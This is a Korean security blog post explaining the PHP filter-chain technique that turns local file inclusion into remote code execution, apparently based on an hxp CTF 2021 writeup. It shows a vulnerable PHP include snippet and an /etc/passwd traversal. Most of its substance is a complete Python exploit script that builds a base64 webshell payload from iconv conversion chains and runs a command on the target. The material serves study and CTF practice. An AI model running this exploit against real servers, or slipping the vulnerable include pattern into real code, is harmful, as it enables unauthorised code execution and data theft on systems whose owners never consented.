[PHP Filter chain] LFI2RCE

728x90

iconv 변환 필터를 이용하여 서버측의 필터링 기능 우회를 성공하면서 발견된 취약점이다.

PHP Filter의 활용

`php://input` , `php://filter` , `php://output` 같은 스트림 래퍼를 활용하여 파일 경로를 조작하거나 데이터를 읽어들일 수 있다.
`php://filter` : php에서 파일 스트림을 필터링할 수 있도록 하는 스트림 래퍼이다. 이를 사용하면 데이터를 실시간으로 변환하거나 필터링 할 수 있다.

php://filter/변환:필터/파일경로

예를 들어 아래와 같은 코드를 사용하면 사용자 입력을 통해 파일 경로를 포함시켜 비인가 경로에 접근 할 수 있다.

<?php
$file = $_GET['file'];
include("php://filter/convert.base64-encode/resource=$file");
?>

file의 파라미터를 통해 URL 파라미터를 `../../etc/passwd` 로 설정하면 파일의 내용을 Base64로 인코딩하여 읽어낼 수 있다.

[PHP Filter chain] LFI2RCE

r = requests.get(challenge_url, params={
    "0": "/readflag",
    "action": "include",
    "file": f"php://filter/{filters}/resource={any_file_we_can_read}"
})
print(r.text)

`convert.iconv.UTF8.CSISO2022KR\x1b$)C` 항상 문자열 앞에 추가됩니다
`convert.base64-decode` 는 기본적으로 유효한 base64가 아닌 모든 문자를 무시합니다.

\x1b$)C위에서 설명한 대로 문자열 앞에 추가합니다 .
초기 base64를 그대로 유지하고 방금 추가한 부분을 유일한 유효한 base64 문자가 base64로 인코딩된 PHP 코드의 다음 부분인 문자열로 변환하는 일부 iconv 변환 체인을 적용합니다.
문자열을 base64-decode 및 base64-encode하여 중간에 있는 모든 가비지를 제거합니다.
우리가 구성하려는 base64가 아직 완료되지 않았다면 1로 돌아갑니다.
base64-decode를 사용하여 php 코드를 얻습니다.

전체 스크립트

import requests

url = "http://localhost/index.php"
file_to_use = "/etc/passwd"
command = "/readflag"

#<?=`$_GET[0]`;;?>
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"

conversions = {
    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
    'C': 'convert.iconv.UTF8.CSISO2022KR',
    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
    '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
    'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
    's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
    'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
    'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
    'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
    'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
    '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
    'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
    'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
    'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
    'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
    '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
    '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
}


# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"


for c in base64_payload[::-1]:
        filters += conversions[c] + "|"
        # decode and reencode to get rid of everything that isn't valid base64
        filters += "convert.base64-decode|"
        filters += "convert.base64-encode|"
        # get rid of equal signs
        filters += "convert.iconv.UTF8.UTF7|"

filters += "convert.base64-decode"

final_payload = f"php://filter/{filters}/resource={file_to_use}"

r = requests.get(url, params={
    "0": command,
    "action": "include",
    "file": final_payload
})

print(r.text)

https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

Solving "includer's revenge" from hxp ctf 2021 without controlling any files - writeup.md

gist.github.com

저작자표시 비영리

'보안 > 취약점' 카테고리의 다른 글

[CVE-2019-19781] CitrixADC 및 CitrixGateway 취약점 (0)	2024.05.27
[CVE-2022-22965] Spring4Shell 취약점 (0)	2024.05.27
[CVE-2018-12116] Node.js SSRF 취약점 (0)	2024.05.27
[CVE-2018-10562] GPON RCE 취약점 (0)	2024.05.25
[CVE-2019-8942] WordPress RCE 취약점 (0)	2024.05.24

내 블로그 - 관리자 홈 전환	`Q` `Q`
새 글 쓰기	`W` `W`

글 수정 (권한 있는 경우)	`E` `E`
댓글 영역으로 이동	`C` `C`

이 페이지의 URL 복사	`S` `S`
맨 위로 이동	`T` `T`
티스토리 홈 이동	`H` `H`
단축키 안내	`Shift` + `/` `⇧` + `/`

fav_sec

[PHP Filter chain] LFI2RCE

PHP Filter의 활용

[PHP Filter chain] LFI2RCE

'보안 > 취약점' 카테고리의 다른 글

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역

« 2025/04 »
일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30

[PHP Filter chain] LFI2RCE

PHP Filter의 활용

[PHP Filter chain] LFI2RCE

'보안 > 취약점' 카테고리의 다른 글

'보안/취약점' 관련글

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역